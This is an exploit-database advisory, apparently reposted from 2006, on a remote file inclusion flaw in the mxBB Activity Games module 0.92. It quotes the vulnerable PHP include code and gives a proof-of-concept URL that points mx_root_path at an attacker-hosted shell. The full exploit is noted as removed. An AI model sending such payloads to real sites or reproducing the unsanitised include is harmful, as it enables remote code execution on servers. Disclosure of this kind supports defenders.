id: 1252
date: 12/11/2006
title: mxBB Module Activity Games 0.92 Remote File Include Vulnerability
author: 3l3ctric-Cracker
cves: 

=================================================================
mxBB Module Activity Games 0.92 Remote File Include Vulnerability
=================================================================



# mx_act (mxBB Games Module)   --Remote File Inclusion Exploit
# Bug Found & Exploit [c]oded By Dr Max Virus

Problem area:

	if ( !file_exists($mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx ) )
	{
	  	include( $mx_root_path . 'modules/mx_act/language/lang_english/lang_activity.'.$phpEx );
		$link_language='lang_english';
	}	
	else
	{
	  	include(  $mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx );
		$link_language='lang_' . $board_config['default_lang'];
	} 

PoC:
	
	http://site.com/mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=http://[yourshell]?&	
	

# exploit was broken and removed.



#  0day.today [2023-03-27]  #